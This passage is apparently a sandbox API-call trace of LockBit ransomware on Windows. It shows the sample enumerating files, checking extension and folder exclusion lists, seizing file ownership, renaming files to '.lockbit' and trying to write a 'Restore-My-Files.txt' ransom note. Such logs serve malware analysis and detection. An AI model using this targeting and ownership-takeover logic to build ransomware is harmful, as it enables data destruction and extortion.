cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0091.081] GetLastError () returned 0x12 [0091.081] FindClose (in: hFindFile=0x2e3290 | out: hFindFile=0x2e3290) returned 1 [0091.081] FindNextFileW (in: hFindFile=0x2e3250, lpFindFileData=0x344d6e8 | out: lpFindFileData=0x344d6e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2ece8572, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x2ece8572, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x2ea60e45, ftLastWriteTime.dwHighDateTime=0x1ca03fa, nFileSizeHigh=0x0, nFileSizeLow=0xb620, dwReserved0=0xfd7545b2, dwReserved1=0x1ca0431, cFileName="hwrcommonlm.dat", cAlternateFileName="")) returned 1 [0091.081] lstrcmpiW (lpString1=".", lpString2="hwrcommonlm.dat") returned -1 [0091.081] lstrcmpiW (lpString1="..", lpString2="hwrcommonlm.dat") returned -1 [0091.081] PathFindExtensionW (pszPath="hwrcommonlm.dat") returned=".dat" [0091.081] lstrcmpiW (lpString1=".386", lpString2=".dat") returned -1 [0091.081] lstrcmpiW (lpString1=".cmd", lpString2=".dat") returned -1 [0091.082] lstrcmpiW (lpString1=".exe", lpString2=".dat") returned 1 [0091.082] lstrcmpiW (lpString1=".ani", lpString2=".dat") returned -1 [0091.082] lstrcmpiW (lpString1=".adv", lpString2=".dat") returned -1 [0091.082] lstrcmpiW (lpString1=".theme", lpString2=".dat") returned 1 [0091.082] lstrcmpiW (lpString1=".msi", lpString2=".dat") returned 1 [0091.082] lstrcmpiW (lpString1=".msp", lpString2=".dat") returned 1 [0091.082] lstrcmpiW (lpString1=".com", lpString2=".dat") returned -1 [0091.082] lstrcmpiW (lpString1=".diagpkg", lpString2=".dat") returned 1 [0091.082] lstrcmpiW (lpString1=".nls", lpString2=".dat") returned 1 [0091.082] lstrcmpiW (lpString1=".diagcab", lpString2=".dat") returned 1 [0091.082] lstrcmpiW (lpString1=".lock", lpString2=".dat") returned 1 [0091.082] lstrcmpiW (lpString1=".ocx", lpString2=".dat") returned 1 [0091.082] lstrcmpiW (lpString1=".mpa", lpString2=".dat") returned 1 [0091.082] lstrcmpiW (lpString1=".cpl", lpString2=".dat") returned -1 [0091.082] lstrcmpiW (lpString1=".mod", lpString2=".dat") returned 1 [0091.082] lstrcmpiW (lpString1=".hta", lpString2=".dat") returned 1 [0091.082] lstrcmpiW (lpString1=".icns", lpString2=".dat") returned 1 [0091.082] lstrcmpiW (lpString1=".prf", lpString2=".dat") returned 1 [0091.082] lstrcmpiW (lpString1=".rtp", lpString2=".dat") returned 1 [0091.082] lstrcmpiW (lpString1=".diagcfg", lpString2=".dat") returned 1 [0091.082] lstrcmpiW (lpString1=".msstyles", lpString2=".dat") returned 1 [0091.082] lstrcmpiW (lpString1=".bin", lpString2=".dat") returned -1 [0091.082] lstrcmpiW (lpString1=".hlp", lpString2=".dat") returned 1 [0091.082] lstrcmpiW (lpString1=".shs", lpString2=".dat") returned 1 [0091.083] lstrcmpiW (lpString1=".drv", lpString2=".dat") returned 1 [0091.083] lstrcmpiW (lpString1=".wpx", lpString2=".dat") returned 1 [0091.083] lstrcmpiW (lpString1=".bat", lpString2=".dat") returned -1 [0091.083] lstrcmpiW (lpString1=".rom", lpString2=".dat") returned 1 [0091.083] lstrcmpiW (lpString1=".msc", lpString2=".dat") returned 1 [0091.083] lstrcmpiW (lpString1=".spl", lpString2=".dat") returned 1 [0091.083] lstrcmpiW (lpString1=".ps1", lpString2=".dat") returned 1 [0091.083] lstrcmpiW (lpString1=".msu", lpString2=".dat") returned 1 [0091.083] lstrcmpiW (lpString1=".ics", lpString2=".dat") returned 1 [0091.083] lstrcmpiW (lpString1=".key", lpString2=".dat") returned 1 [0091.083] lstrcmpiW (lpString1=".mp3", lpString2=".dat") returned 1 [0091.083] lstrcmpiW (lpString1=".reg", lpString2=".dat") returned 1 [0091.083] lstrcmpiW (lpString1=".dll", lpString2=".dat") returned 1 [0091.083] lstrcmpiW (lpString1=".ini", lpString2=".dat") returned 1 [0091.083] lstrcmpiW (lpString1=".idx", lpString2=".dat") returned 1 [0091.083] lstrcmpiW (lpString1=".sys", lpString2=".dat") returned 1 [0091.083] lstrcmpiW (lpString1=".hlp", lpString2=".dat") returned 1 [0091.083] lstrcmpiW (lpString1=".ico", lpString2=".dat") returned 1 [0091.083] lstrcmpiW (lpString1=".lnk", lpString2=".dat") returned 1 [0091.083] lstrcmpiW (lpString1=".rdp", lpString2=".dat") returned 1 [0091.083] wsprintfW (in: param_1=0x344d620, param_2="%S" | out: param_1="Restore-My-Files.txt") returned 20 [0091.083] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="hwrcommonlm.dat") returned 1 [0091.083] lstrcmpiW (lpString1="ntldr", lpString2="hwrcommonlm.dat") returned 1 [0091.084] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="hwrcommonlm.dat") returned 1 [0091.084] lstrcmpiW (lpString1="bootsect.bak", lpString2="hwrcommonlm.dat") returned -1 [0091.084] lstrcmpiW (lpString1="autorun.inf", lpString2="hwrcommonlm.dat") returned -1 [0091.084] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\") returned="" [0091.084] PathFindExtensionW (pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrcommonlm.dat") returned=".dat" [0091.084] lstrcmpiW (lpString1=".rar", lpString2=".dat") returned 1 [0091.084] lstrcmpiW (lpString1=".zip", lpString2=".dat") returned 1 [0091.084] lstrcmpiW (lpString1=".7z", lpString2=".dat") returned -1 [0091.084] lstrcmpiW (lpString1=".ckp", lpString2=".dat") returned -1 [0091.084] lstrcmpiW (lpString1=".dacpac", lpString2=".dat") returned -1 [0091.084] lstrcmpiW (lpString1=".db", lpString2=".dat") returned 1 [0091.084] lstrcmpiW (lpString1=".db-shm", lpString2=".dat") returned 1 [0091.084] lstrcmpiW (lpString1=".db-wal", lpString2=".dat") returned 1 [0091.084] lstrcmpiW (lpString1=".db3", lpString2=".dat") returned 1 [0091.084] lstrcmpiW (lpString1=".dbf", lpString2=".dat") returned 1 [0091.084] lstrcmpiW (lpString1=".dbc", lpString2=".dat") returned 1 [0091.084] lstrcmpiW (lpString1=".dbs", lpString2=".dat") returned 1 [0091.084] lstrcmpiW (lpString1=".dbt", lpString2=".dat") returned 1 [0091.084] lstrcmpiW (lpString1=".dbv", lpString2=".dat") returned 1 [0091.084] lstrcmpiW (lpString1=".frm", lpString2=".dat") returned 1 [0091.084] lstrcmpiW (lpString1=".mdf", lpString2=".dat") returned 1 [0091.084] lstrcmpiW (lpString1=".mrg", lpString2=".dat") returned 1 [0091.085] lstrcmpiW (lpString1=".mwb", lpString2=".dat") returned 1 [0091.085] lstrcmpiW (lpString1=".myd", lpString2=".dat") returned 1 [0091.085] lstrcmpiW (lpString1=".ndf", lpString2=".dat") returned 1 [0091.085] lstrcmpiW (lpString1=".qry", lpString2=".dat") returned 1 [0091.085] lstrcmpiW (lpString1=".sdb", lpString2=".dat") returned 1 [0091.085] lstrcmpiW (lpString1=".sdf", lpString2=".dat") returned 1 [0091.085] lstrcmpiW (lpString1=".sql", lpString2=".dat") returned 1 [0091.085] lstrcmpiW (lpString1=".sqlite", lpString2=".dat") returned 1 [0091.085] lstrcmpiW (lpString1=".sqlite3", lpString2=".dat") returned 1 [0091.085] lstrcmpiW (lpString1=".sqlitedb", lpString2=".dat") returned 1 [0091.085] lstrcmpiW (lpString1=".tmd", lpString2=".dat") returned 1 [0091.085] wsprintfW (in: param_1=0x344cdc0, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrcommonlm.dat.lockbit") returned 75 [0091.085] lstrcmpiW (lpString1=".dat", lpString2=".lockbit") returned -1 [0091.085] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrcommonlm.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrcommonlm.dat"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrcommonlm.dat.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrcommonlm.dat.lockbit")) returned 0 [0091.085] GetLastError () returned 0x5 [0091.086] GetProcAddress (hModule=0x77150000, lpProcName="RtlFreeUnicodeString") returned 0x7717e126 [0091.086] GetProcAddress (hModule=0x77150000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77191660 [0091.086] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0091.086] GetProcAddress (hModule=0x77150000, lpProcName="NtOpenFile") returned 0x7716fd54 [0091.087] GetProcAddress (hModule=0x77150000, lpProcName="NtClose") returned 0x7716f9d0 [0091.087] NtOpenFile (in: FileHandle=0x344cd68, DesiredAccess=0x80, ObjectAttributes=0x344cc18*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrcommonlm.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrcommonlm.dat"), Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x344cc10, ShareAccess=0x7, OpenOptions=0x0 | out: FileHandle=0x344cd68*=0x3bc, IoStatusBlock=0x344cc10*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0091.087] GetProcAddress (hModule=0x77150000, lpProcName="NtQueryInformationFile") returned 0x7716fa00 [0091.087] NtQueryInformationFile (in: FileHandle=0x3bc, IoStatusBlock=0x344cc30, FileInformation=0x344caf0, Length=0x110, FileInformationClass=0x2f | out: IoStatusBlock=0x344cc30, FileInformation=0x344caf0) returned 0x0 [0091.099] NtClose (Handle=0x3bc) returned 0x0 [0091.100] RtlFreeAnsiString (AnsiString="\\") [0091.100] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x344cda4 | out: TokenHandle=0x344cda4*=0x3bc) returned 1 [0091.100] malloc (_Size=0x200) returned 0x53fcc0 [0091.100] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x53fcc0, TokenInformationLength=0x200, ReturnLength=0x344cda0 | out: TokenInformation=0x53fcc0, ReturnLength=0x344cda0) returned 1 [0091.100] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x344cd88, dwRevision=0x1 | out: pSecurityDescriptor=0x344cd88) returned 1 [0091.100] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x344cd88, pOwner=0x53fcc8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x2f)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x344cd88) returned 1 [0091.100] CloseHandle (hObject=0x3bc) returned 1 [0091.100] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrcommonlm.dat", SecurityInformation=0x1, pSecurityDescriptor=0x344cd88) returned 1 [0091.100] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrcommonlm.dat", SecurityInformation=0x4, pSecurityDescriptor=0x344cd88) returned 1 [0091.101] free (_Block=0x53fcc0) [0091.101] lstrcmpiW (lpString1=".dat", lpString2=".lockbit") returned -1 [0091.101] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrcommonlm.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrcommonlm.dat"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrcommonlm.dat.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrcommonlm.dat.lockbit")) returned 1 [0091.102] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrcommonlm.dat.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrcommonlm.dat.lockbit"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3bc [0091.102] CreateIoCompletionPort (FileHandle=0x3bc, ExistingCompletionPort=0x1e4, CompletionKey=0x0, NumberOfConcurrentThreads=0x8) returned 0x1e4 [0091.102] malloc (_Size=0x40068) returned 0x206b860 [0091.102] GetFileSizeEx (in: hFile=0x3bc, lpFileSize=0x206b878 | out: lpFileSize=0x206b878*=46624) returned 1 [0091.102] ReadFile (in: hFile=0x3bc, lpBuffer=0x206b894, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894*, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860) returned 1 [0091.200] GetLastError () returned 0x3e5 [0091.200] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrcommonlm.dat" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink") returned 1 [0091.200] wsprintfW (in: param_1=0x344cb78, param_2="%s%S" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\Restore-My-Files.txt") returned 72 [0091.200] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\Restore-My-Files.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0091.200] FindNextFileW (in: hFindFile=0x2e3250, lpFindFileData=0x344d6e8 | out: lpFindFileData=0x344d6e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9e0df36a, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaabda5f8, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9e0df36a, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfd7545b2, dwReserved1=0x1ca0431, cFileName="HWRCustomization", cAlternateFileName="HWRCUS~1")) returned 1 [0091.200] lstrcmpiW (lpString1=".", lpString2="HWRCustomization") returned -1 [0091.200] lstrcmpiW (lpString1="..", lpString2="HWRCustomization") returned -1 [0091.200] lstrcmpiW (lpString1="HWRCustomization", lpString2="$windows.~bt") returned 1 [0091.200] lstrcmpiW (lpString1="HWRCustomization", lpString2="intel") returned -1 [0091.200] lstrcmpiW (lpString1="HWRCustomization", lpString2="msocache") returned -1 [0091.200] lstrcmpiW (lpString1="HWRCustomization", lpString2="$recycle.bin") returned 1 [0091.200] lstrcmpiW (lpString1="HWRCustomization", lpString2="$windows.~ws") returned 1 [0091.200] lstrcmpiW (lpString1="HWRCustomization", lpString2="tor browser") returned -1 [0091.200] lstrcmpiW (lpString1="HWRCustomization", lpString2="boot") returned 1 [0091.200] lstrcmpiW (lpString1="HWRCustomization", lpString2="system volume information") returned -1 [0091.201] lstrcmpiW (lpString1="HWRCustomization", lpString2="perflogs") returned -1 [0091.201] lstrcmpiW (lpString1="HWRCustomization", lpString2="google") returned 1 [0091.201] lstrcmpiW (lpString1="HWRCustomization", lpString2="application data") returned 1 [0091.201] lstrcmpiW (lpString1="HWRCustomization", lpString2="windows") returned -1 [0091.201] lstrcmpiW (lpString1="HWRCustomization", lpString2="windows.old") returned -1 [0091.201] lstrcmpiW (lpString1="HWRCustomization", lpString2="appdata") returned 1 [0091.201] lstrcmpiW (lpString1="HWRCustomization", lpString2="Windows nt") returned -1 [0091.201] lstrcmpiW (lpString1="HWRCustomization", lpString2="Msbuild") returned -1 [0091.201] lstrcmpiW (lpString1="HWRCustomization", lpString2="Microsoft") returned -1 [0091.201] lstrcmpiW (lpString1="HWRCustomization", lpString2="All users") returned 1 [0091.201] lstrcmpiW (lpString1="HWRCustomization", lpString2="mozilla") returned -1 [0091.201] wsprintfW (in: param_1=0x344d200, param_2="%s\\%s" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\HWRCustomization") returned 68 [0091.201] wsprintfW (in: param_1=0x344ca60, param_2="%s\\*" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\HWRCustomization\\*") returned 70 [0091.201] FindFirstFileExW (in: lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\HWRCustomization\\*" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrcustomization\\*"), fInfoLevelId=0x0, lpFindFileData=0x344cf48, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x344cf48) returned 0x2e3290 [0091.202] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0091.202] FindNextFileW (in: hFindFile=0x2e3290, lpFindFileData=0x344cf48 | out: lpFindFileData=0x344cf48*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9e0df36a, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaabda5f8, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9e0df36a, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfd7545b2, dwReserved1=0x1ca0431, cFileName="..", cAlternateFileName="")) returned 1 [0091.202] lstrcmpiW (lpString1=".", lpString2="..") returned -1 [0091.202] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0091.202] FindNextFileW (in: hFindFile=0x2e3290, lpFindFileData=0x344cf48 | out: lpFindFileData=0x344cf48*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9e0df36a, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaabda5f8, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9e0df36a, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfd7545b2, dwReserved1=0x1ca0431, cFileName="..", cAlternateFileName="")) returned 0 [0091.202] GetLastError () returned 0x12 [0091.202] FindClose (in: hFindFile=0x2e3290 | out: hFindFile=0x2e3290) returned 1 [0091.202] FindNextFileW (in: hFindFile=0x2e3250, lpFindFileData=0x344d6e8 | out: lpFindFileData=0x344d6e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2f7eaa54, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x2f7eaa54, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x2f301d57, ftLastWriteTime.dwHighDateTime=0x1ca03fa, nFileSizeHigh=0x0, nFileSizeLow=0xb6710, dwReserved0=0xfd7545b2, dwReserved1=0x1ca0431, cFileName="hwrenalm.dat", cAlternateFileName="")) returned 1 [0091.203] lstrcmpiW (lpString1=".", lpString2="hwrenalm.dat") returned -1 [0091.203] lstrcmpiW (lpString1="..", lpString2="hwrenalm.dat") returned -1 [0091.203] PathFindExtensionW (pszPath="hwrenalm.dat") returned=".dat" [0091.203] lstrcmpiW (lpString1=".386", lpString2=".dat") returned -1 [0091.203] lstrcmpiW (lpString1=".cmd", lpString2=".dat") returned -1 [0091.203] lstrcmpiW (lpString1=".exe", lpString2=".dat") returned 1 [0091.203] lstrcmpiW (lpString1=".ani", lpString2=".dat") returned -1 [0091.203] lstrcmpiW (lpString1=".adv", lpString2=".dat") returned -1 [0091.203] lstrcmpiW (lpString1=".theme", lpString2=".dat") returned 1 [0091.203] lstrcmpiW (lpString1=".msi", lpString2=".dat") returned 1 [0091.203] lstrcmpiW (lpString1=".msp", lpString2=".dat") returned 1 [0091.203] lstrcmpiW (lpString1=".com", lpString2=".dat") returned -1 [0091.203] lstrcmpiW (lpString1=".diagpkg", lpString2=".dat") returned 1 [0091.203] lstrcmpiW (lpString1=".nls", lpString2=".dat") returned 1 [0091.203] lstrcmpiW (lpString1=".diagcab", lpString2=".dat") returned 1 [0091.203] lstrcmpiW (lpString1=".lock", lpString2=".dat") returned 1 [0091.203] lstrcmpiW (lpString1=".ocx", lpString2=".dat") returned 1 [0091.203] lstrcmpiW (lpString1=".mpa", lpString2=".dat") returned 1 [0091.203] lstrcmpiW (lpString1=".cpl", lpString2=".dat") returned -1 [0091.203] lstrcmpiW (lpString1=".mod", lpString2=".dat") returned 1 [0091.203] lstrcmpiW (lpString1=".hta", lpString2=".dat") returned 1 [0091.203] lstrcmpiW (lpString1=".icns", lpString2=".dat") returned 1 [0091.203] lstrcmpiW (lpString1=".prf", lpString2=".dat") returned 1 [0091.203] lstrcmpiW (lpString1=".rtp", lpString2=".dat") returned 1 [0091.204] lstrcmpiW (lpString1=".diagcfg", lpString2=".dat") returned 1 [0091.204] lstrcmpiW (lpString1=".msstyles", lpString2=".dat") returned 1 [0091.204] lstrcmpiW (lpString1=".bin", lpString2=".dat") returned -1 [0091.204] lstrcmpiW (lpString1=".hlp", lpString2=".dat") returned 1 [0091.204] lstrcmpiW (lpString1=".shs", lpString2=".dat") returned 1 [0091.204] lstrcmpiW (lpString1=".drv", lpString2=".dat") returned 1 [0091.204] lstrcmpiW (lpString1=".wpx", lpString2=".dat") returned 1 [0091.204] lstrcmpiW (lpString1=".bat", lpString2=".dat") returned -1 [0091.204] lstrcmpiW (lpString1=".rom", lpString2=".dat") returned 1 [0091.204] lstrcmpiW (lpString1=".msc", lpString2=".dat") returned 1 [0091.204] lstrcmpiW (lpString1=".spl", lpString2=".dat") returned 1 [0091.204] lstrcmpiW (lpString1=".ps1", lpString2=".dat") returned 1 [0091.204] lstrcmpiW (lpString1=".msu", lpString2=".dat") returned 1 [0091.204] lstrcmpiW (lpString1=".ics", lpString2=".dat") returned 1 [0091.204] lstrcmpiW (lpString1=".key", lpString2=".dat") returned 1 [0091.204] lstrcmpiW (lpString1=".mp3", lpString2=".dat") returned 1 [0091.204] lstrcmpiW (lpString1=".reg", lpString2=".dat") returned 1 [0091.204] lstrcmpiW (lpString1=".dll", lpString2=".dat") returned 1 [0091.204] lstrcmpiW (lpString1=".ini", lpString2=".dat") returned 1 [0091.204] lstrcmpiW (lpString1=".idx", lpString2=".dat") returned 1 [0091.204] lstrcmpiW (lpString1=".sys", lpString2=".dat") returned 1 [0091.204] lstrcmpiW (lpString1=".hlp", lpString2=".dat") returned 1 [0091.204] lstrcmpiW (lpString1=".ico", lpString2=".dat") returned 1 [0091.204] lstrcmpiW (lpString1=".lnk", lpString2=".dat") returned 1 [0091.204] lstrcmpiW (lpString1=".rdp", lpString2=".dat") returned 1 [0091.205] wsprintfW (in: param_1=0x344d620, param_2="%S" | out: param_1="Restore-My-Files.txt") returned 20 [0091.205] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="hwrenalm.dat") returned 1 [0091.205] lstrcmpiW (lpString1="ntldr", lpString2="hwrenalm.dat") returned 1 [0091.205] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="hwrenalm.dat") returned 1 [0091.205] lstrcmpiW (lpString1="bootsect.bak", lpString2="hwrenalm.dat") returned -1 [0091.205] lstrcmpiW (lpString1="autorun.inf", lpString2="hwrenalm.dat") returned -1 [0091.205] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\") returned="" [0091.205] PathFindExtensionW (pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrenalm.dat") returned=".dat" [0091.205] lstrcmpiW (lpString1=".rar", lpString2=".dat") returned 1 [0091.205] lstrcmpiW (lpString1=".zip", lpString2=".dat") returned 1 [0091.205] lstrcmpiW (lpString1=".7z", lpString2=".dat") returned -1 [0091.205] lstrcmpiW (lpString1=".ckp", lpString2=".dat") returned -1 [0091.205] lstrcmpiW (lpString1=".dacpac", lpString2=".dat") returned -1 [0091.205] lstrcmpiW (lpString1=".db", lpString2=".dat") returned 1 [0091.205] lstrcmpiW (lpString1=".db-shm", lpString2=".dat") returned 1 [0091.205] lstrcmpiW (lpString1=".db-wal", lpString2=".dat") returned 1 [0091.205] lstrcmpiW (lpString1=".db3", lpString2=".dat") returned 1 [0091.205] lstrcmpiW (lpString1=".dbf", lpString2=".dat") returned 1 [0091.205] lstrcmpiW (lpString1=".dbc", lpString2=".dat") returned 1 [0091.205] lstrcmpiW (lpString1=".dbs", lpString2=".dat") returned 1 [0091.205] lstrcmpiW (lpString1=".dbt", lpString2=".dat") returned 1 [0091.205] lstrcmpiW (lpString1=".dbv", lpString2=".dat") returned 1 [0091.206] lstrcmpiW (lpString1=".frm", lpString2=".dat") returned 1 [0091.206] lstrcmpiW (lpString1=".mdf", lpString2=".dat") returned 1 [0091.206] lstrcmpiW (lpString1=".mrg", lpString2=".dat") returned 1 [0091.206] lstrcmpiW (lpString1=".mwb", lpString2=".dat") returned 1 [0091.206] lstrcmpiW (lpString1=".myd", lpString2=".dat") returned 1 [0091.206] lstrcmpiW (lpString1=".ndf", lpString2=".dat") returned 1 [0091.206] lstrcmpiW (lpString1=".qry", lpString2=".dat") returned 1 [0091.206] lstrcmpiW (lpString1=".sdb", lpString2=".dat") returned 1 [0091.206] lstrcmpiW (lpString1=".sdf", lpString2=".dat") returned 1 [0091.206] lstrcmpiW (lpString1=".sql", lpString2=".dat") returned 1 [0091.206] lstrcmpiW (lpString1=".sqlite", lpString2=".dat") returned 1 [0091.206] lstrcmpiW (lpString1=".sqlite3", lpString2=".dat") returned 1 [0091.206] lstrcmpiW (lpString1=".sqlitedb", lpString2=".dat") returned 1 [0091.206] lstrcmpiW (lpString1=".tmd", lpString2=".dat") returned 1 [0091.206] wsprintfW (in: param_1=0x344cdc0, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrenalm.dat.lockbit") returned 72 [0091.206] lstrcmpiW (lpString1=".dat", lpString2=".lockbit") returned -1 [0091.206] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrenalm.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrenalm.dat"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrenalm.dat.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrenalm.dat.lockbit")) returned 0 [0091.210] GetLastError () returned 0x5 [0091.210] GetProcAddress (hModule=0x77150000, lpProcName="RtlFreeUnicodeString") returned 0x7717e126 [0091.210] GetProcAddress (hModule=0x77150000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77191660 [0091.210] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0091.211] GetProcAddress (hModule=0x77150000, lpProcName="NtOpenFile") returned 0x7716fd54 [0091.211] GetProcAddress (hModule=0x77150000, lpProcName="NtClose") returned 0x7716f9d0 [0091.211] NtOpenFile (in: FileHandle=0x344cd68, DesiredAccess=0x80, ObjectAttributes=0x344cc18*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrenalm.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrenalm.dat"), Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x344cc10, ShareAccess=0x7, OpenOptions=0x0 | out: FileHandle=0x344cd68*=0x3c0, IoStatusBlock=0x344cc10*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0091.212] GetProcAddress (hModule=0x77150000, lpProcName="NtQueryInformationFile") returned 0x7716fa00 [0091.212] NtQueryInformationFile (in: FileHandle=0x3c0, IoStatusBlock=0x344cc30, FileInformation=0x344caf0, Length=0x110, FileInformationClass=0x2f | out: IoStatusBlock=0x344cc30, FileInformation=0x344caf0) returned 0x0 [0091.226] NtClose (Handle=0x3c0) returned 0x0 [0091.226] RtlFreeAnsiString (AnsiString="\\") [0091.226] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x344cda4 | out: TokenHandle=0x344cda4*=0x3c0) returned 1 [0091.226] malloc (_Size=0x200) returned 0x53fcc0 [0091.226] GetTokenInformation (in: TokenHandle=0x3c0, TokenInformationClass=0x1, TokenInformation=0x53fcc0, TokenInformationLength=0x200, ReturnLength=0x344cda0 | out: TokenInformation=0x53fcc0, ReturnLength=0x344cda0) returned 1 [0091.227] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x344cd88, dwRevision=0x1 | out: pSecurityDescriptor=0x344cd88) returned 1 [0091.227] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x344cd88, pOwner=0x53fcc8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x2f)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x344cd88) returned 1 [0091.227] CloseHandle 